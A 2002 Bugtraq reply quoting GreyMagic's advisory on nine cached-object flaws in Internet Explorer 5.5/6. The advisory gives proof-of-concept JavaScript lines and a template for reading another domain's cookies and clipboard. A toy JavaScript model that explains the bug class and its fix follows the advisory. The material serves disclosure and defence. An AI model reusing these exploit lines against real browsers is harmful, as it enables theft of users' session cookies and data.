The external method flaw also seems to affect my IE6 SP1 browser -- jelmer
----- Original Message -----
From: "GreyMagic Software" <[EMAIL PROTECTED]>
To: "Bugtraq" <[EMAIL PROTECTED]>
Sent: Tuesday, October 22, 2002 5:24 PM
Subject: Vulnerable cached objects in IE (9 advisories in 1)

> GreyMagic Security Advisory GM#012-IE
> =====================================
>
> By GreyMagic Software, Israel.
> 22 Oct 2002.
>
> Available in HTML format at http://security.greymagic.com/adv/gm012-ie/.
>
> Topic: Vulnerable cached objects in IE (9 advisories in 1).
>
> Discovery date: 4 Oct 2002, 17 Oct 2002, 21 Oct 2002.
>
> Affected applications:
> ======================
>
> Microsoft Internet Explorer 5.5 and 6.0; prior versions and IE6 SP1 are not
> vulnerable.
>
> Note that any other application that uses Internet Explorer's engine
> (WebBrowser control) is affected as well (AOL Browser, MSN Explorer, etc.).
>
>
> Introduction:
> =============
>
> When communicating between windows, security checks ensure that both pages
> are in the same security zone and on the same domain. These crucial security
> checks wrongly assume that certain methods and objects are only going to be
> called through their respective window. This assumption enables some cached
> methods and objects to provide interoperability between otherwise separated
> documents.
>
> Many security issues arise from storing references to objects that are
> supposed to be inaccessible when the page unloads. PivX lately disclosed
> such an issue in the <object> element, which left a valid reference in its
> "object" property.
>
> Discussion:
> ===========
>
> Through exhaustive research, we discovered nine vulnerabilities in Internet
> Explorer involving object caching, most of them highly critical. We're
> grouping all of these vulnerabilities into this advisory in order to avoid a
> flood and repetitive statements.
>
> Object caching takes place when the attacker opens a window to a page in his
> own site. The URL in the window is then changed to the victim page, but the
> cached references stay in place, providing direct access to the new
> document.
>
> All nine vulnerabilities are of the same general class (object caching).
> However, each of them is a separate vulnerability, which uses a unique
> method for exploitation.
>
> Each item in the list below consists of three parts, "Cache" shows how to
> cache the vulnerable object, "Exploit" shows how the vulnerability works in
> context and "Impact" details the implications of the vulnerability.
>
> "Full access" means access to any page's Document Object Model in any domain
> and any zone. The implications include (but are not limited to) reading cookies
> from any domain, forging content in any URL, reading local files and
> executing arbitrary programs.
>
>
> 1. showModalDialog
>
> Cache: var fVuln=oWin.showModalDialog;
> Exploit - IE 5.5:
> fVuln("javascript:alert(dialogArguments.document.cookie)",oWin,"");
> Exploit - IE 6: Not trivial but possible, by using our old "analyze.dlg"
> vulnerability.
> Impact: Full access in IE5.5, "My Computer" zone access in IE6.
>
>
> 2. external
>
> Cache: var oVuln=oWin.external;
> Exploit: oVuln.NavigateAndFind("javascript:alert(document.cookie)","","");
> Impact: Full access.
>
>
> 3. createRange
>
> Cache: var fVuln=oWin.document.selection.createRange;
> Exploit: fVuln().pasteHTML("<img
> src=\"javascript:alert(document.cookie)\">");
> Impact: Full access.
>
>
> 4. elementFromPoint
>
> Cache: var fVuln=oWin.document.elementFromPoint;
> Exploit: alert(fVuln(1,1).document.cookie);
> Impact: Full access.
>
>
> 5. getElementById
>
> Cache: var fVuln=oWin.document.getElementById;
> Exploit: alert(fVuln("ElementIdInNewDoc").document.cookie);
> Impact: Full access.
>
>
> 6. getElementsByName
>
> Cache: var fVuln=oWin.document.getElementsByName;
> Exploit: alert(fVuln("ElementNameInNewDoc")[0].document.cookie);
> Impact: Full access.
>
>
> 7. getElementsByTagName
>
> Cache: var fVuln=oWin.document.getElementsByTagName;
> Exploit: alert(fVuln("BODY")[0].document.cookie);
> Impact: Full access.
>
>
> 8. execCommand
>
> Cache: var fVuln=oWin.document.execCommand;
> Exploit: fVuln("SelectAll"); fVuln("Copy");
> alert(clipboardData.getData("text"));
> Impact: Read access to the loaded document.
>
>
> 9. clipboardData
>
> Cache: var oVuln=oWin.clipboardData;
> Exploit: alert(oVuln.getData("text")); or oVuln.setData("text","data");
> Impact: Read/write access to the clipboard, regardless of settings.
>
>
> IE 5 SP2 and IE6 SP1 are not vulnerable.
>
>
> Exploit:
> ========
>
> This generic exploit demonstrates how an attacker may read the client's
> "google.com" cookie using one of the cached objects above.
>
> <script language="jscript">
> var oWin=open("blank.html","victim","width=100,height=100");
> [Cache line here]
> location.href="http://google.com";
> setTimeout(
> function () {
> [Exploit line(s) here]
> },
> 3000
> );
> </script>
>
>
> Solution:
> =========
>
> Until a patch becomes available either disable Active Scripting or upgrade
> to IE6 SP1.
>
>
> Tested on:
> ==========
>
> IE5.5 Win98.
> IE5.5 NT4.
> IE6 Win98.
> IE6 Win2000.
> IE6 WinXP.
>
>
> Demonstration:
> ==============
>
> We put together a single nine-in-one proof of concept demonstration, which
> can be found at http://security.greymagic.com/adv/gm012-ie/.
>
>
> Feedback:
> =========
>
> Please mail any questions or comments to [EMAIL PROTECTED]
>
> - Copyright © 2002 GreyMagic Software.
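As an added illustration (not part of jelmer's reply or the GreyMagic advisory, and not IE code), the toy model below shows why the bug class in the advisory works: the cross-domain check runs once, when a method is fetched from the window, so a reference cached before the window navigates keeps working against the new document. The fixed variant repeats the check against the window's current document on every call. `Win`, `getCookieReaderVuln`, `getCookieReaderFixed` and `replay` are hypothetical names, and the domains and cookie value are constructed.

```javascript
// Toy model of a cross-window access check. Win is a hypothetical stand-in
// for a browser window object; it survives navigation, its document does not.
class Win {
  constructor(domain, cookie) {
    this.domain = domain;
    this.document = { domain, cookie };
  }
  // Simulates location.href="...": the document is replaced in place, but
  // the Win object (and anything already cached from it) stays alive.
  navigate(domain, cookie) {
    this.document = { domain, cookie };
  }
}

function sameDomain(caller, target) {
  return caller.domain === target.document.domain;
}

// Vulnerable pattern: the domain check happens only when the method is
// fetched; the returned function is then trusted for the window's lifetime.
function getCookieReaderVuln(caller, target) {
  if (!sameDomain(caller, target)) throw new Error("access denied");
  return function () { return target.document.cookie; };
}

// Fixed pattern: the check is re-run against the *current* document every
// time the cached function is invoked, so a post-navigation call is refused.
function getCookieReaderFixed(caller, target) {
  if (!sameDomain(caller, target)) throw new Error("access denied");
  return function () {
    if (!sameDomain(caller, target)) throw new Error("access denied");
    return target.document.cookie;
  };
}

// Replays the advisory's sequence: open a same-domain window, cache a
// reference, navigate the window elsewhere, then call the cached reference.
// Returns the cookie that leaked, or the error message if access was denied.
function replay(getReader) {
  const attacker = new Win("attacker.example", "");          // constructed
  const popup = new Win("attacker.example", "");             // the blank page
  const cached = getReader(attacker, popup);                 // cache step
  popup.navigate("victim.example", "session=constructed");   // URL changed
  try { return cached(); } catch (e) { return e.message; }
}
```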